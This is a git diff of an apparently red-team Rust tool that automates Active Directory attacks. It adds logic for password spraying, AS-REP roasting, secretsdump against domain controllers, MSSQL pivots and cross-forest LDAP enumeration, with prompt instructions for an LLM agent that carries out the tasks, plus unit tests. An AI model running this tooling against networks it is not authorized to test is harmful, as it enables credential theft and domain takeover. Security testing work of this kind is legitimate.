+ let state = shared.read().await;
+ let work = collect_cert_auth_work(&state);
+ assert_eq!(work.len(), 2);
+ let ids: std::collections::HashSet<_> = work.iter().map(|w| w.vuln_id.as_str()).collect();
+ assert!(ids.contains("cert-200"));
+ assert!(ids.contains("cert-201"));
+ }
+
+ #[tokio::test]
+ async fn collect_dc_ip_lookup_is_case_insensitive() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ // DC stored under lowercase
+ s.domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let mut details = std::collections::HashMap::new();
+ details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx"));
+ // Domain in mixed case in vuln details
+ details.insert("domain".into(), serde_json::json!("CONTOSO.LOCAL"));
+ s.discovered_vulnerabilities.insert(
+ "cert-130".into(),
+ make_vuln("cert-130", "certificate_obtained", details),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_cert_auth_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].dc_ip, Some("192.168.58.10".into()));
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/credential_access.rs b/ares-cli/src/orchestrator/automation/credential_access.rs
index 0baeb0a7..a30f0cf0 100644
--- a/ares-cli/src/orchestrator/automation/credential_access.rs
+++ b/ares-cli/src/orchestrator/automation/credential_access.rs
@@ -101,10 +101,16 @@ pub async fn auto_credential_access(
};
for (domain, dc_ip) in asrep_work {
+ let excluded_users = dispatcher
+ .state
+ .read()
+ .await
+ .quarantined_users_in_domain(&domain);
let payload = json!({
"techniques": ["kerberos_user_enum_noauth", "asrep_roast", "username_as_password"],
"target_ip": dc_ip,
"domain": domain,
+ "excluded_users": excluded_users.join(","),
});
let priority = dispatcher.effective_priority("asrep_roast");
@@ -150,14 +156,14 @@ pub async fn auto_credential_access(
if state.is_processed(DEDUP_CRACK_REQUESTS, &dedup) {
return None;
}
- // Exact domain match first
- if let Some(dc_ip) = state.domain_controllers.get(&cred_domain).cloned() {
+ // Exact domain match first (using robust DC resolution)
+ if let Some(dc_ip) = state.resolve_dc_ip(&cred_domain) {
return Some((dedup, dc_ip, cred_domain, cred.clone()));
}
// Fallback: check child domains (e.g. cred has "contoso.local"
// but user is actually in "child.contoso.local")
let suffix = format!(".{cred_domain}");
- for (domain, dc_ip) in &state.domain_controllers {
+ for (domain, dc_ip) in &state.all_domains_with_dcs() {
if domain.ends_with(&suffix) {
debug!(
cred_domain = %cred_domain,
@@ -215,6 +221,10 @@ pub async fn auto_credential_access(
.users
.iter()
.filter(|u| !u.domain.is_empty())
+ // Skip AD built-in disabled accounts (guest, krbtgt, etc.).
+ // Spraying these can never succeed and burns badPwdCount budget
+ // that real accounts share under domain lockout policy.
+ .filter(|u| !ares_core::models::is_always_disabled_account(&u.username))
// Skip delegation accounts — their auth budget is reserved for
// S4U exploitation. Spraying them causes lockout before S4U fires.
.filter(|u| !state.is_delegation_account(&u.username))
@@ -256,10 +266,16 @@ pub async fn auto_credential_access(
}
sprayed_domains.insert(domain.clone());
+ let excluded_users = dispatcher
+ .state
+ .read()
+ .await
+ .quarantined_users_in_domain(domain);
let payload = json!({
"technique": "username_as_password",
"target_ip": dc_ip,
"domain": domain,
+ "excluded_users": excluded_users.join(","),
});
match dispatcher
@@ -510,12 +526,19 @@ pub async fn auto_credential_access(
};
for (domain, dc_ip) in common_spray_work {
+ let excluded_users = dispatcher
+ .state
+ .read()
+ .await
+ .quarantined_users_in_domain(&domain);
let payload = json!({
"techniques": ["password_spray", "username_as_password"],
"reason": "low_hanging_fruit",
"target_ip": dc_ip,
"domain": domain,
"use_common_passwords": true,
+ "acknowledge_no_policy": true,
+ "excluded_users": excluded_users.join(","),
});
// Mark as processed BEFORE submitting to prevent duplicate deferred entries.
@@ -552,6 +575,8 @@ pub async fn auto_credential_access(
mod tests {
use super::*;
+ // --- kerberoast_dedup_key ---
+
#[test]
fn kerberoast_dedup_key_basic() {
assert_eq!(
@@ -573,6 +598,8 @@ mod tests {
assert_eq!(kerberoast_dedup_key("", ""), "krb::");
}
+ // --- spray_dedup_key ---
+
#[test]
fn spray_dedup_key_basic() {
assert_eq!(
@@ -591,6 +618,8 @@ mod tests {
assert_eq!(spray_dedup_key("", ""), ":");
}
+ // --- common_spray_dedup_key ---
+
#[test]
fn common_spray_dedup_key_basic() {
assert_eq!(
@@ -604,6 +633,8 @@ mod tests {
assert_eq!(common_spray_dedup_key(""), "common:");
}
+ // --- low_hanging_dedup_key ---
+
#[test]
fn low_hanging_dedup_key_basic() {
assert_eq!(
@@ -617,6 +648,8 @@ mod tests {
assert_eq!(low_hanging_dedup_key("", ""), ":");
}
+ // --- credential_secretsdump_dedup_key ---
+
#[test]
fn credential_secretsdump_dedup_key_basic() {
assert_eq!(
@@ -639,6 +672,8 @@ mod tests {
assert_eq!(credential_secretsdump_dedup_key("", "", ""), "::");
}
+ // --- resolve_host_domain_from_fqdn ---
+
#[test]
fn resolve_host_domain_from_fqdn_typical() {
assert_eq!(
@@ -673,6 +708,8 @@ mod tests {
assert_eq!(resolve_host_domain_from_fqdn(""), "");
}
+ // --- is_host_domain_related ---
+
#[test]
fn is_host_domain_related_same_domain() {
assert!(is_host_domain_related("contoso.local", "contoso.local"));
diff --git a/ares-cli/src/orchestrator/automation/credential_expansion.rs b/ares-cli/src/orchestrator/automation/credential_expansion.rs
index 773af2d6..dcae7770 100644
--- a/ares-cli/src/orchestrator/automation/credential_expansion.rs
+++ b/ares-cli/src/orchestrator/automation/credential_expansion.rs
@@ -8,8 +8,9 @@
use std::sync::Arc;
use std::time::Duration;
+use redis::AsyncCommands;
use tokio::sync::watch;
-use tracing::debug;
+use tracing::{debug, info};
use crate::orchestrator::dispatcher::Dispatcher;
use crate::orchestrator::state::*;
@@ -319,7 +320,11 @@ pub async fn auto_credential_expansion(
// This is the fastest path from hash → krbtgt → DA.
{
let state = dispatcher.state.read().await;
- let dc_ips: Vec = state.domain_controllers.values().cloned().collect();
+ let dc_ips: Vec = state
+ .all_domains_with_dcs()
+ .into_iter()
+ .map(|(_, ip)| ip)
+ .collect();
drop(state);
if !dispatcher.is_technique_allowed("secretsdump") {
@@ -378,7 +383,120 @@ pub async fn auto_credential_expansion(
.await;
}
}
+
+ // 5. Re-dispatch unsuccessful mssql_access vulns when a new same-domain
+ // cleartext credential is available. Cross-forest MSSQL pivots fail
+ // if the LLM tries them before any usable cred exists in the linked
+ // server's source forest — once that cred arrives, push the vuln
+ // back into the exploitation ZSET so the LLM gets another shot
+ // with the new credential set in its prompt context.
+ let retries = collect_mssql_retries(&dispatcher).await;
+ for retry in retries {
+ if let Err(e) = requeue_mssql_vuln(&dispatcher, &retry).await {
+ debug!(err = %e, vuln_id = %retry.vuln_id, "Failed to requeue mssql_access");
+ continue;
+ }
+ info!(
+ vuln_id = %retry.vuln_id,
+ cred_user = %retry.cred_user,
+ cred_domain = %retry.cred_domain,
+ "Re-queued mssql_access for new credential"
+ );
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_MSSQL_RETRY, retry.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_MSSQL_RETRY, &retry.dedup_key)
+ .await;
+ }
+ }
+}
+
+struct MssqlRetry {
+ vuln_id: String,
+ vuln_json: String,
+ priority: i32,
+ cred_user: String,
+ cred_domain: String,
+ dedup_key: String,
+}
+
+/// Walk discovered vulnerabilities for `mssql_access` entries that are not
+/// yet exploited and have at least one matching unseen credential. Builds
+/// a (vuln, credential) work item with a stable dedup key so the same
+/// vuln/cred pair is not re-queued repeatedly.
+async fn collect_mssql_retries(dispatcher: &Arc) -> Vec {
+ let state = dispatcher.state.read().await;
+ let mut out = Vec::new();
+ for vuln in state.discovered_vulnerabilities.values() {
+ if vuln.vuln_type != "mssql_access" {
+ continue;
+ }
+ if state.exploited_vulnerabilities.contains(&vuln.vuln_id) {
+ continue;
+ }
+ let vuln_domain = vuln
+ .details
+ .get("domain")
+ .and_then(|v| v.as_str())
+ .unwrap_or("")
+ .to_lowercase();
+ for cred in &state.credentials {
+ if cred.password.is_empty() || cred.domain.is_empty() {
+ continue;
+ }
+ // Match on domain when the vuln carries one. Otherwise match any
+ // cred — the LLM will pick from the prompt's credential list.
+ let cred_dom = cred.domain.to_lowercase();
+ let matches_domain = vuln_domain.is_empty()
+ || cred_dom == vuln_domain
+ || cred_dom.ends_with(&format!(".{vuln_domain}"))
+ || vuln_domain.ends_with(&format!(".{cred_dom}"));
+ if !matches_domain {
+ continue;
+ }
+ let dedup_key = format!(
+ "{}:{}:{}",
+ vuln.vuln_id,
+ cred.username.to_lowercase(),
+ cred_dom
+ );
+ if state.is_processed(DEDUP_MSSQL_RETRY, &dedup_key) {
+ continue;
+ }
+ let Ok(vuln_json) = serde_json::to_string(vuln) else {
+ continue;
+ };
+ out.push(MssqlRetry {
+ vuln_id: vuln.vuln_id.clone(),
+ vuln_json,
+ priority: vuln.priority,
+ cred_user: cred.username.clone(),
+ cred_domain: cred.domain.clone(),
+ dedup_key,
+ });
+ }
}
+ out
+}
+
+/// Push the vuln back into the exploitation ZSET. The exploitation_workflow
+/// loop pops by lowest score; reuse the original priority so the retry
+/// competes fairly with other work.
+async fn requeue_mssql_vuln(
+ dispatcher: &Arc,
+ retry: &MssqlRetry,
+) -> anyhow::Result<()> {
+ let key = dispatcher.state.vuln_queue_key().await;
+ let mut conn = dispatcher.queue.connection();
+ let _: () = conn
+ .zadd(&key, &retry.vuln_json, retry.priority as f64)
+ .await?;
+ let _: () = conn.expire(&key, 86400).await.unwrap_or(());
+ Ok(())
}
struct ExpansionWork {
@@ -423,12 +541,12 @@ mod tests {
#[test]
fn netbios_domain_resolution() {
// Simulate the NetBIOS→FQDN resolution logic from the automation loop
- let raw = "NORTH";
+ let raw = "CHILD";
let raw_lower = raw.to_lowercase();
// When netbios_to_fqdn has a mapping, use it
let mut map = std::collections::HashMap::new();
- map.insert("north".to_string(), "north.contoso.local".to_string());
+ map.insert("child".to_string(), "child.contoso.local".to_string());
let resolved = if !raw_lower.contains('.') {
map.get(&raw_lower)
@@ -437,7 +555,7 @@ mod tests {
} else {
raw_lower.clone()
};
- assert_eq!(resolved, "north.contoso.local");
+ assert_eq!(resolved, "child.contoso.local");
// When FQDN is already used, pass through
let fqdn_raw = "contoso.local";
@@ -452,7 +570,7 @@ mod tests {
assert_eq!(resolved2, "contoso.local");
// When no mapping exists, use the raw value
- let unknown = "CHILD";
+ let unknown = "UNKNOWN";
let unknown_lower = unknown.to_lowercase();
let resolved3 = if !unknown_lower.contains('.') {
map.get(&unknown_lower)
@@ -461,7 +579,7 @@ mod tests {
} else {
unknown_lower.clone()
};
- assert_eq!(resolved3, "child");
+ assert_eq!(resolved3, "unknown");
}
#[test]
diff --git a/ares-cli/src/orchestrator/automation/credential_reuse.rs b/ares-cli/src/orchestrator/automation/credential_reuse.rs
index ebacf8dd..3573ab06 100644
--- a/ares-cli/src/orchestrator/automation/credential_reuse.rs
+++ b/ares-cli/src/orchestrator/automation/credential_reuse.rs
@@ -19,6 +19,13 @@ use crate::orchestrator::dispatcher::Dispatcher;
const DEDUP_CROSS_REUSE: &str = "cross_reuse";
/// Check if a username is a high-value reuse candidate.
+///
+/// Machine accounts (`HOST$`) are NEVER reuse candidates — their NT hash is
+/// derived from the computer's randomly-generated 240-byte password and is
+/// bound to that computer object in its source NTDS. The hash will not
+/// authenticate as another machine, in another domain, or in any trusted
+/// forest. Dispatching `secretsdump` with a foreign machine hash always
+/// returns STATUS_LOGON_FAILURE and just burns dispatcher budget.
fn is_reuse_candidate(username: &str) -> bool {
if username.ends_with('$') {
return false;
@@ -87,7 +94,7 @@ pub async fn auto_credential_reuse(
let state = dispatcher.state.read().await;
// Need at least 2 known DCs (implies multiple domains)
- if state.domain_controllers.len() < 2 {
+ if state.all_domains_with_dcs().len() < 2 {
continue;
}
@@ -105,7 +112,7 @@ pub async fn auto_credential_reuse(
for hash in &reuse_candidates {
let hash_domain = hash.domain.to_lowercase();
- for (dc_domain, dc_ip) in &state.domain_controllers {
+ for (dc_domain, dc_ip) in &state.all_domains_with_dcs() {
let target_domain = dc_domain.to_lowercase();
// Skip same domain and parent/child domains (handled by secretsdump.rs)
diff --git a/ares-cli/src/orchestrator/automation/cross_forest_enum.rs b/ares-cli/src/orchestrator/automation/cross_forest_enum.rs
new file mode 100644
index 00000000..98d62dfc
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/cross_forest_enum.rs
@@ -0,0 +1,881 @@
+//! auto_cross_forest_enum -- targeted cross-forest enumeration.
+//!
+//! When we have Admin Pwn3d on a DC in a foreign forest but haven't enumerated
+//! that forest's users/groups, this module dispatches targeted LDAP enumeration
+//! using the best available credential path.
+//!
+//! Unlike `auto_domain_user_enum` (which fires once per domain), this module
+//! retries with better credentials as they become available — specifically:
+//! - Cracked passwords from cross-forest secretsdump hashes
+//! - Credentials obtained via MSSQL linked server pivots
+//! - Admin credentials from owned DCs in the foreign forest
+//!
+//! This covers the gap where the trusted forest's users are not enumerated
+//! because initial recon only has primary-forest credentials.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Check if a credential belongs to a different forest than the target domain.
+fn is_cross_forest(cred_domain: &str, target_domain: &str) -> bool {
+ let c = cred_domain.to_lowercase();
+ let t = target_domain.to_lowercase();
+ // Same domain or parent/child = same forest
+ !(c == t || c.ends_with(&format!(".{t}")) || t.ends_with(&format!(".{c}")))
+}
+
+/// Build dedup key incorporating the credential to allow retry with better creds.
+fn cross_forest_dedup_key(domain: &str, username: &str, cred_domain: &str) -> String {
+ format!(
+ "xforest:{}:{}@{}",
+ domain.to_lowercase(),
+ username.to_lowercase(),
+ cred_domain.to_lowercase()
+ )
+}
+
+fn bind_domain_for_cross_forest(cred_domain: &str, target_domain: &str) -> Option {
+ if cred_domain.trim().is_empty() || cred_domain.eq_ignore_ascii_case(target_domain) {
+ None
+ } else {
+ Some(cred_domain.to_string())
+ }
+}
+
+/// Collect cross-forest enumeration work items from the current state.
+///
+/// Returns an empty vec when there are fewer than 2 domains, no credentials,
+/// or no actionable work to dispatch.
+fn collect_cross_forest_work(state: &StateInner) -> Vec {
+ if state.credentials.is_empty() || state.domains.len() < 2 {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ for (domain, dc_ip) in &state.all_domains_with_dcs() {
+ let domain_lower = domain.to_lowercase();
+
+ // Count how many users we know in this domain.
+ let known_user_count = state
+ .credentials
+ .iter()
+ .filter(|c| c.domain.to_lowercase() == domain_lower)
+ .count();
+
+ // Also count hashes for this domain.
+ let known_hash_count = state
+ .hashes
+ .iter()
+ .filter(|h| h.domain.to_lowercase() == domain_lower)
+ .count();
+
+ // Skip domains where we already have good coverage
+ // (at least 5 credentials or 10 hashes = likely already enumerated).
+ if known_user_count >= 5 || known_hash_count >= 10 {
+ continue;
+ }
+
+ // Find the best credential for this domain.
+ // Priority: same-domain cred > admin cred > cracked hash > any cred.
+ let best_cred = state
+ .credentials
+ .iter()
+ .filter(|c| {
+ !c.password.is_empty() && !state.is_credential_quarantined(&c.username, &c.domain)
+ })
+ .min_by_key(|c| {
+ let c_dom = c.domain.to_lowercase();
+ if c_dom == domain_lower {
+ 0 // Same domain = best
+ } else if c.is_admin {
+ 1 // Admin from another domain = good (trust auth)
+ } else if !is_cross_forest(&c_dom, &domain_lower) {
+ 2 // Same forest = acceptable
+ } else {
+ 3 // Cross-forest = may work via trust
+ }
+ })
+ .cloned();
+
+ let cred = match best_cred {
+ Some(c) => c,
+ None => continue,
+ };
+
+ let dedup_key = cross_forest_dedup_key(&domain_lower, &cred.username, &cred.domain);
+ if state.is_processed(DEDUP_CROSS_FOREST_ENUM, &dedup_key) {
+ continue;
+ }
+
+ items.push(CrossForestWork {
+ dedup_key,
+ domain: domain.clone(),
+ dc_ip: dc_ip.clone(),
+ credential: cred,
+ is_under_enumerated: known_user_count < 3,
+ });
+ }
+
+ items
+}
+
+/// Dispatches targeted user + group enumeration for foreign forests.
+/// Interval: 45s.
+pub async fn auto_cross_forest_enum(
+ dispatcher: Arc,
+ mut shutdown: watch::Receiver,
+) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ // Wait for initial credential discovery and cross-domain pivots.
+ tokio::time::sleep(Duration::from_secs(120)).await;
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("cross_forest_enum") {
+ continue;
+ }
+
+ let work: Vec = {
+ let state = dispatcher.state.read().await;
+ collect_cross_forest_work(&state)
+ };
+ if work.is_empty() {
+ continue;
+ }
+
+ for item in work {
+ // Dispatch user enumeration
+ let mut user_payload = json!({
+ "technique": "ldap_user_enumeration",
+ "target_ip": item.dc_ip,
+ "domain": item.domain,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ "filters": ["(objectCategory=person)(objectClass=user)"],
+ "attributes": [
+ "sAMAccountName", "description", "memberOf",
+ "userAccountControl", "servicePrincipalName",
+ "msDS-AllowedToDelegateTo", "adminCount"
+ ],
+ "cross_forest": true,
+ "instructions": concat!(
+ "This is a cross-forest enumeration task. Enumerate ALL users in the ",
+ "target domain via LDAP. If the credential is from a different domain, ",
+ "authenticate via the forest trust. Report every user found with their ",
+ "group memberships, SPNs, delegation settings, and description fields. ",
+ "Pay special attention to accounts with adminCount=1, ",
+ "DoesNotRequirePreAuth, or interesting SPNs.\n\n",
+ "IMPORTANT: For each user found, include them in the discovered_users ",
+ "array with EXACTLY this JSON format:\n",
+ " {\"username\": \"samaccountname\", \"domain\": \"domain.local\", ",
+ "\"source\": \"ldap_enumeration\", \"memberOf\": [\"Group1\", \"Group2\"]}\n",
+ "Also report users with DoesNotRequirePreAuth as vulnerabilities with ",
+ "vuln_type='asrep_roastable', and users with SPNs as vuln_type='kerberoastable'."
+ ),
+ });
+ if let Some(bind_domain) =
+ bind_domain_for_cross_forest(&item.credential.domain, &item.domain)
+ {
+ user_payload["bind_domain"] = json!(bind_domain);
+ }
+
+ let priority = dispatcher.effective_priority("cross_forest_enum");
+ match dispatcher
+ .throttled_submit("recon", "recon", user_payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ domain = %item.domain,
+ dc = %item.dc_ip,
+ cred_user = %item.credential.username,
+ cred_domain = %item.credential.domain,
+ under_enumerated = item.is_under_enumerated,
+ "Cross-forest user enumeration dispatched"
+ );
+ }
+ Ok(None) => {
+ debug!(domain = %item.domain, "Cross-forest user enum deferred");
+ continue; // Don't mark as processed if deferred
+ }
+ Err(e) => {
+ warn!(err = %e, domain = %item.domain, "Failed to dispatch cross-forest user enum");
+ continue;
+ }
+ }
+
+ // Also dispatch group enumeration for the same domain
+ let mut group_payload = json!({
+ "technique": "ldap_group_enumeration",
+ "target_ip": item.dc_ip,
+ "domain": item.domain,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ "filters": ["(objectCategory=group)"],
+ "attributes": [
+ "sAMAccountName", "member", "memberOf", "managedBy",
+ "groupType", "objectSid", "description"
+ ],
+ "enumerate_members": true,
+ "resolve_foreign_principals": true,
+ "cross_forest": true,
+ "instructions": concat!(
+ "Enumerate ALL security groups in this domain and their members. ",
+ "Resolve Foreign Security Principals to their source domain. ",
+ "Report group name, type (Global/DomainLocal/Universal), members, ",
+ "and managed-by. This is critical for mapping cross-domain attack paths.\n\n",
+ "IMPORTANT: For each user found in any group, include them in the ",
+ "discovered_users array with EXACTLY this JSON format:\n",
+ " {\"username\": \"samaccountname\", \"domain\": \"domain.local\", ",
+ "\"source\": \"ldap_group_enumeration\", \"memberOf\": [\"Group1\", \"Group2\"]}"
+ ),
+ });
+ if let Some(bind_domain) =
+ bind_domain_for_cross_forest(&item.credential.domain, &item.domain)
+ {
+ group_payload["bind_domain"] = json!(bind_domain);
+ }
+
+ let group_priority = dispatcher.effective_priority("group_enumeration");
+ if let Ok(Some(task_id)) = dispatcher
+ .throttled_submit("recon", "recon", group_payload, group_priority)
+ .await
+ {
+ info!(
+ task_id = %task_id,
+ domain = %item.domain,
+ "Cross-forest group enumeration dispatched"
+ );
+ }
+
+ // Mark as processed
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_CROSS_FOREST_ENUM, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_CROSS_FOREST_ENUM, &item.dedup_key)
+ .await;
+ }
+ }
+}
+
+struct CrossForestWork {
+ dedup_key: String,
+ domain: String,
+ dc_ip: String,
+ credential: ares_core::models::Credential,
+ is_under_enumerated: bool,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ #[test]
+ fn is_cross_forest_same_domain() {
+ assert!(!is_cross_forest("contoso.local", "contoso.local"));
+ }
+
+ #[test]
+ fn is_cross_forest_child_domain() {
+ assert!(!is_cross_forest("child.contoso.local", "contoso.local"));
+ }
+
+ #[test]
+ fn is_cross_forest_parent_domain() {
+ assert!(!is_cross_forest("contoso.local", "child.contoso.local"));
+ }
+
+ #[test]
+ fn is_cross_forest_different_forests() {
+ assert!(is_cross_forest("contoso.local", "fabrikam.local"));
+ }
+
+ #[test]
+ fn is_cross_forest_case_insensitive() {
+ assert!(!is_cross_forest("CONTOSO.LOCAL", "contoso.local"));
+ assert!(is_cross_forest("CONTOSO.LOCAL", "fabrikam.local"));
+ }
+
+ #[test]
+ fn dedup_key_format() {
+ let key = cross_forest_dedup_key("fabrikam.local", "Admin", "CONTOSO.LOCAL");
+ assert_eq!(key, "xforest:fabrikam.local:admin@contoso.local");
+ }
+
+ #[test]
+ fn dedup_key_case_insensitive() {
+ let k1 = cross_forest_dedup_key("FABRIKAM.LOCAL", "Admin", "contoso.local");
+ let k2 = cross_forest_dedup_key("fabrikam.local", "admin", "CONTOSO.LOCAL");
+ assert_eq!(k1, k2);
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_CROSS_FOREST_ENUM, "cross_forest_enum");
+ }
+
+ #[test]
+ fn bind_domain_added_for_foreign_forest() {
+ assert_eq!(
+ bind_domain_for_cross_forest("contoso.local", "fabrikam.local"),
+ Some("contoso.local".to_string())
+ );
+ }
+
+ #[test]
+ fn bind_domain_omitted_for_same_domain() {
+ assert_eq!(
+ bind_domain_for_cross_forest("contoso.local", "contoso.local"),
+ None
+ );
+ }
+
+ #[test]
+ fn bind_domain_omitted_when_credential_domain_empty() {
+ assert_eq!(bind_domain_for_cross_forest("", "fabrikam.local"), None);
+ }
+
+ #[test]
+ fn is_cross_forest_empty_strings() {
+ // Empty strings are equal (same empty domain)
+ assert!(!is_cross_forest("", ""));
+ }
+
+ #[test]
+ fn is_cross_forest_one_empty() {
+ assert!(is_cross_forest("contoso.local", ""));
+ assert!(is_cross_forest("", "contoso.local"));
+ }
+
+ #[test]
+ fn is_cross_forest_deeply_nested() {
+ assert!(!is_cross_forest("a.b.contoso.local", "contoso.local"));
+ assert!(!is_cross_forest("contoso.local", "a.b.contoso.local"));
+ }
+
+ #[test]
+ fn cross_forest_work_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: true,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let work = CrossForestWork {
+ dedup_key: "xforest:fabrikam.local:admin@contoso.local".into(),
+ domain: "fabrikam.local".into(),
+ dc_ip: "192.168.58.20".into(),
+ credential: cred,
+ is_under_enumerated: true,
+ };
+ assert!(work.is_under_enumerated);
+ assert_eq!(work.domain, "fabrikam.local");
+ }
+
+ #[test]
+ fn user_enum_payload_structure() {
+ let payload = serde_json::json!({
+ "technique": "ldap_user_enumeration",
+ "target_ip": "192.168.58.20",
+ "domain": "fabrikam.local",
+ "credential": {
+ "username": "admin",
+ "password": "P@ssw0rd!",
+ "domain": "contoso.local",
+ },
+ "cross_forest": true,
+ });
+ assert_eq!(payload["technique"], "ldap_user_enumeration");
+ assert!(payload["cross_forest"].as_bool().unwrap());
+ assert_eq!(payload["domain"], "fabrikam.local");
+ }
+
+ #[test]
+ fn group_enum_payload_structure() {
+ let payload = serde_json::json!({
+ "technique": "ldap_group_enumeration",
+ "target_ip": "192.168.58.20",
+ "domain": "fabrikam.local",
+ "resolve_foreign_principals": true,
+ "cross_forest": true,
+ });
+ assert_eq!(payload["technique"], "ldap_group_enumeration");
+ assert!(payload["resolve_foreign_principals"].as_bool().unwrap());
+ }
+
+ #[test]
+ fn coverage_threshold_values() {
+ // Module uses: known_user_count >= 5 || known_hash_count >= 10
+ let known_user_count = 4;
+ let known_hash_count = 9;
+ assert!(known_user_count < 5 && known_hash_count < 10); // should trigger enum
+
+ let known_user_count2 = 5;
+ assert!(known_user_count2 >= 5); // should skip
+
+ let known_hash_count2 = 10;
+ assert!(known_hash_count2 >= 10); // should skip
+ }
+
+ #[test]
+ fn under_enumerated_threshold() {
+ // is_under_enumerated = known_user_count < 3
+ let counts = [0_usize, 2, 3, 5];
+ assert!(counts[0] < 3); // 0 users = under-enumerated
+ assert!(counts[1] < 3); // 2 users = under-enumerated
+ assert!(counts[2] >= 3); // 3 users = not under-enumerated
+ }
+
+ // --- collect_cross_forest_work tests ---
+
+ fn make_cred(
+ id: &str,
+ user: &str,
+ pass: &str,
+ domain: &str,
+ admin: bool,
+ ) -> ares_core::models::Credential {
+ ares_core::models::Credential {
+ id: id.into(),
+ username: user.into(),
+ password: pass.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: admin,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ fn make_hash(user: &str, domain: &str) -> ares_core::models::Hash {
+ ares_core::models::Hash {
+ id: format!("h-{user}"),
+ username: user.into(),
+ hash_value: "aad3b435b51404eeaad3b435b51404ee:deadbeef".into(),
+ hash_type: "ntlm".into(),
+ domain: domain.into(),
+ cracked_password: None,
+ source: "test".into(),
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ aes_key: None,
+ }
+ }
+
+ #[tokio::test]
+ async fn collect_empty_state_no_work() {
+ let state = SharedState::new("test".into());
+ let inner = state.read().await;
+ let work = collect_cross_forest_work(&inner);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_single_domain_no_work() {
+ let state = SharedState::new("test".into());
+ {
+ let mut s = state.write().await;
+ s.domains.push("contoso.local".into());
+ s.credentials.push(make_cred(
+ "c1",
+ "user1",
+ "P@ssw0rd!",
+ "contoso.local",
+ false,
+ )); // pragma: allowlist secret
+ s.domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ }
+ let inner = state.read().await;
+ let work = collect_cross_forest_work(&inner);
+ assert!(work.is_empty(), "single domain should produce no work");
+ }
+
+ #[tokio::test]
+ async fn collect_no_credentials_no_work() {
+ let state = SharedState::new("test".into());
+ {
+ let mut s = state.write().await;
+ s.domains.push("contoso.local".into());
+ s.domains.push("fabrikam.local".into());
+ s.domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ s.domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ }
+ let inner = state.read().await;
+ let work = collect_cross_forest_work(&inner);
+ assert!(work.is_empty(), "no credentials should produce no work");
+ }
+
+ #[tokio::test]
+ async fn collect_two_domains_with_cross_forest_cred() {
+ let state = SharedState::new("test".into());
+ {
+ let mut s = state.write().await;
+ s.domains.push("contoso.local".into());
+ s.domains.push("fabrikam.local".into());
+ s.domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ s.domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ s.credentials
+ .push(make_cred("c1", "admin", "P@ssw0rd!", "contoso.local", true));
+ // pragma: allowlist secret
+ }
+ let inner = state.read().await;
+ let work = collect_cross_forest_work(&inner);
+ // Should produce work for both domains (the cred works for contoso as same-domain,
+ // and for fabrikam as cross-forest).
+ assert!(!work.is_empty());
+ // At least one item should target fabrikam
+ assert!(work.iter().any(|w| w.domain == "fabrikam.local"));
+ }
+
+ #[tokio::test]
+ async fn collect_skips_domain_with_five_credentials() {
+ let state = SharedState::new("test".into());
+ {
+ let mut s = state.write().await;
+ s.domains.push("contoso.local".into());
+ s.domains.push("fabrikam.local".into());
+ s.domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ s.domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ // 5 credentials for fabrikam = already enumerated
+ for i in 0..5 {
+ s.credentials.push(make_cred(
+ &format!("c{i}"),
+ &format!("user{i}"),
+ "P@ssw0rd!", // pragma: allowlist secret
+ "fabrikam.local",
+ false,
+ ));
+ }
+ // Also need a cred that can authenticate
+ s.credentials
+ .push(make_cred("cx", "admin", "P@ssw0rd!", "contoso.local", true));
+ // pragma: allowlist secret
+ }
+ let inner = state.read().await;
+ let work = collect_cross_forest_work(&inner);
+ // fabrikam should be skipped (>= 5 creds), contoso should appear
+ assert!(
+ work.iter().all(|w| w.domain != "fabrikam.local"),
+ "domain with >= 5 credentials should be skipped"
+ );
+ }
+
+ #[tokio::test]
